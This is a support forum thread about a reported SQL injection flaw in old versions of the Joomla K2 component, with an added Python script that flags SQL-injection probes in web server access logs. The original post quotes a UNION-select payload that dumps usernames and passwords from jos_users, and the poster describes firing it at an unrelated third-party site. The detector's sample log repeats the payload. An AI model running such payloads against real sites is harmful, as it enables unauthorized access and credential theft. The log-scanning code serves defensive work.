Test Result sql injection on K2 backtrack

11 years 5 months ago #111701 by zafreelance
Test Result sql injection on K2 backtrack was created by zafreelance
Hello K2 team. Thank you for the extension, I love it a lot.
I have a small concern about the security of this extension:
after the vulnerability tests with "Backtrack", the result shows that the extension has a SQL injection vulnerability. I think it concerns the first version of K2?

here is the message:

19 # 16
Info -> Component: com_k2 (sectionid) SQL Injection Vulnerability
Versions Effected: 1.0.1 Beta <=
Check: / components/com_k2 /
Exploit: / index.php? Com_k2 option = & view = category & itemlist = null 'and 1 = 2 union select 1, concat (username, 0x3a, password), 3,4,5,6,7,8,9,10,11, usertype from jos_users Where 12,13,14 0x53757065722041646d696e6973747261746f72 = -
Vulnerable? No

Does this SQL injection apply to the latest version 2.6.6 of K2?

Another thing: I tried to inject this code into my site for testing:

mysite.com / index.php? com_k2 option = & view = category & itemlist = null 'and 1 = 2 union select 1, concat (username, 0x3a, password), 3,4,5,6,7,8,9,10,11 , 12,13,14 usertype from jos_users Where 0x53757065722041646d696e6973747261746f72 = -


The result: a large page with multiple K2 items????? This is not normal, right?


Also, my friends, I tried this code on a site that uses K2 (city-adm.lviv.ua/);
the site gave me a 404 error page!!


How can I add such an error page to redirect SQL-injection-style links?

Thank you, I need your help before the launch of my site.

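A defender's-side way to answer the "how do I catch these links" question is to look for the shape of such a probe in the web server's access log rather than hoping for a 404. The script below is an added example, not part of this thread and not K2's or Joomla's own code; it parses combined-format log lines (the sample lines are constructed here, with documentation-range IP addresses) and flags query-string values that carry classic SQL-injection markers: a `union ... select`, a numeric tautology such as `and 1=2`, a long hex literal, a `concat(` call, or a trailing comment terminator.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample access-log lines (combined log format); not real traffic.
# Line 2 mimics the shape of the scanner probe quoted in the thread, line 4 is
# a simpler tautology probe, lines 1 and 3 are ordinary K2 page requests.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2013:12:00:01 +0000] "GET /index.php?option=com_k2&view=item&id=12 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Jan/2013:12:00:02 +0000] "GET /index.php?option=com_k2&view=itemlist&id=null'%20and%201=2%20union%20select%201,concat(username,0x3a,password),3%20from%20jos_users-- HTTP/1.1" 200 40960
198.51.100.7 - - [10/Jan/2013:12:00:03 +0000] "GET /index.php?option=com_k2&view=itemlist&task=category&id=3 HTTP/1.1" 200 8192
203.0.113.9 - - [10/Jan/2013:12:00:04 +0000] "GET /index.php?option=com_k2&view=item&id=12%20OR%201%3D1 HTTP/1.1" 200 5120
"""

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Heuristic indicators, evaluated against each URL-decoded query parameter value.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "tautology":    re.compile(r"\b(?:and|or)\b\s+\d+\s*=\s*\d+", re.I),
    "hex_literal":  re.compile(r"\b0x[0-9a-f]{6,}\b", re.I),   # long 0x... string literal
    "concat_call":  re.compile(r"\bconcat\s*\(", re.I),
    "comment_tail": re.compile(r"(?:--|#|/\*)\s*$"),           # comment used to cut the query
}


def decoded_params(target):
    """Split the request target's query string into (name, value) pairs.

    parse_qsl already percent-decodes once; the extra unquote_plus catches
    values that were encoded twice to slip past naive filters.
    """
    query = urlsplit(target).query
    return [(k, unquote_plus(v)) for k, v in parse_qsl(query, keep_blank_values=True)]


def inspect_request(line):
    """Return a finding dict for a suspicious log line, or None if it is clean/unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = {}
    for name, value in decoded_params(m.group("target")):
        flagged = [ind for ind, rx in INDICATORS.items() if rx.search(value)]
        if flagged:
            hits[name] = flagged
    if not hits:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "status": m.group("status"), "params": hits}


def scan_log(text):
    """Run inspect_request over every line of a log and collect the findings."""
    return [f for f in (inspect_request(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        # A 200 on a flagged request is the case worth a closer look: the
        # application answered the probe instead of rejecting it.
        print(f"{finding['ts']} {finding['ip']} status={finding['status']} "
              f"suspicious params: {finding['params']}")
```

Run it against a real access log by feeding the file contents to `scan_log`; a flagged request that received a 200 rather than a 404 is the one to investigate, because it means the component rendered something for the injected parameter. The patterns are deliberately simple and will produce false positives on free-text search fields, so treat the output as a triage list, not a verdict.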

11 years 5 months ago #111702 by Krikor Boghossian
Replied by Krikor Boghossian on topic Re: Test Result sql injection on K2 backtrack
Hello,

"Versions Effected: 1.0.1 Beta" is a long, long time ago. No need to worry about any new versions of K2.

As for the redirects, you can use the redirect plugin: Components => Redirect.

JoomlaWorks Support Team
---
Please search the forum before posting a new topic :)


11 years 5 months ago #111703 by zafreelance
Replied by zafreelance on topic Re: Test Result sql injection on K2 backtrack
I work with version 2.6.6; I just wanted to test the site before launch.
Frankly, K2 is safe; from experience, I've received several attempts to hack the K2 component, but nobody succeeded :)

except once, some injections in the comments, but I solved the problem.


11 years 2 months ago - 11 years 2 months ago #111704 by VietPublic
Replied by VietPublic on topic Re: Test Result sql injection on K2 backtrack
Some sites were hacked and all passwords changed to Admin or win32conficker.
(My sites use: K2 2.6.6 with comments disabled & News Show Pro GK4 only.)



Powered by Kunena Forum